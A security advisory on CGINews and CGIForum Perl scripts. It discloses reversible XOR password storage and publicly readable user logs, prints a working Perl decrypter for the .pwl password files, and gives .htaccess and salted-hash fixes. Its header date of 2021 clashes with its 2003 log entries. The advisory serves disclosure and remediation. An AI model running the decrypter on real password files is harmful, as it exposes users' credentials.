GulfTech Computers - Professional Computer Services  

Issues In CGINews And CGIForum
December 14, 2021


Vendor : Markus Triska
URL : http://triskam.virtualave.net/cginews.html
Version : 1.07 And Possibly Earlier & CGIForum 1.09
Risk : Weak Encryption & Info Disclosure


Description:
CGINews is a multi-user Web site news posting system written in Perl. Main features include: adding, updating, and deleting news entries, multi-user functionality, sections, access levels, logs, highly-configurable layout, file upload, binary attachments and more.


Weak Password Encryption:
The CGINews program does not use DES, MD5 or any other one-way crypt algorithm. Instead it uses a weak, reversible method. Below is a script that can easily decrypt the passwords found in the program's *.pwl files. This issue is also present in CGIForum 1.09 by Markus Triska, so the script can be used to decode CGIForum password files as well.



###################################################################################
# Markus Triska Password Decrypter. Works on most if not all Markus Triska products
# For example: CGIForum, CGINews etc - Written By JeiAr [ http://www.gulftech.org ]
###################################################################################
print "CGI News 1.07 - Pass Decrypt Utility \n";
print "------------------------------------ \n";
print "By JeiAr [ http://www.gulftech.org ] \n";
print "\n" x 3;
print "Please Enter Encrypted Pass:";
$UserPassword = <STDIN>;
chomp $UserPassword;
$UserPassword = EncDec($UserPassword);
print "\n" x 5;
print "Decrypted Pass Is: $UserPassword\n";
# XOR each character with 0x12; the same routine both encrypts and decrypts
sub EncDec
{
	my @args = split //, shift();
	my $retval = '';
	for (my $stringpos = 0; $stringpos <= $#args; $stringpos++) {
		$retval .= chr(ord($args[$stringpos]) ^ 0x12);
	}
	return $retval;
}
exit;
###################################################################################


Information Disclosure Vulnerability:
By default, each user's log file is viewable at username/username.log. The only files not viewable by default are the .pwl files.



Sat Dec 13 21:06:37 2003: jeiar changed password.
Sat Dec 13 21:10:21 2003: jeiar changed E-Mail/Syntax: test@blah/jeiar.
Sat Dec 13 21:10:54 2003: jeiar tried to change password.
Sat Dec 13 21:13:59 2003: jeiar uploaded file: C:\cmd.exe
Sat Dec 13 21:31:38 2003: jeiar uploaded file: C:\cnc.pl


Solution:
You can add your own DES or MD5 encryption if you are familiar with Perl. To solve the log file problem, simply add a .htaccess file that makes the directory not viewable. For example:



AuthType Basic
AuthName "No access"
AuthUserFile .htnopasswd
AuthGroupFile /dev/null
Require valid-user

The author plans on including this type of .htaccess file in future versions, but does not have any plans to change or strengthen the encryption method.
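
As an added illustration of the first half of the Solution (this is not code from CGINews, CGIForum or the advisory's author), the Perl below contrasts the reversible XOR storage with a salted one-way MD5 record. The function names, the salt$digest record format and the sample password are assumptions made for this example.

```perl
#!/usr/bin/perl
# Added example, not CGINews code: reversible XOR storage vs. a salted one-way hash.
use strict;
use warnings;
use Digest::MD5 qw(md5_hex);

# The scheme described in the advisory: every character XORed with 0x12.
# Applying it twice returns the input, so the stored value is as good as plaintext.
sub xor_store {
    my ($text) = @_;
    return join '', map { chr(ord($_) ^ 0x12) } split //, $text;
}

# Hypothetical replacement: store "salt$digest" instead of a reversible string.
# MD5 is used because the advisory names it; any stronger digest fits the same shape.
sub hash_password {
    my ($password, $salt) = @_;
    # rand() is not a cryptographic RNG; the salt only has to differ per user here
    $salt //= join '', map { ('a'..'z', 'A'..'Z', 0..9)[rand 62] } 1 .. 8;
    return $salt . '$' . md5_hex($salt . $password);
}

# Verification re-hashes the candidate with the stored salt and compares records.
# Nothing in the stored record can be turned back into the password.
sub check_password {
    my ($candidate, $stored) = @_;
    my ($salt, $digest) = split /\$/, $stored, 2;
    return 0 unless defined $digest;
    return hash_password($candidate, $salt) eq $stored ? 1 : 0;
}

my $password = 'constructed-sample-pw';    # constructed sample value

my $weak = xor_store($password);
print "XOR round-trip recovers plaintext: ",
    (xor_store($weak) eq $password ? "yes" : "no"), "\n";

my $stored = hash_password($password);
print "Stored record: $stored\n";
print "Correct password accepted: ",
    (check_password($password, $stored) ? "yes" : "no"), "\n";
print "Wrong password accepted:   ",
    (check_password('not-the-password', $stored) ? "yes" : "no"), "\n";
```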


Credits:
Credits go to JeiAr of the GulfTech Security Research Team.






© Copyright 2002 - GulfTech Computers, All Rights Reserved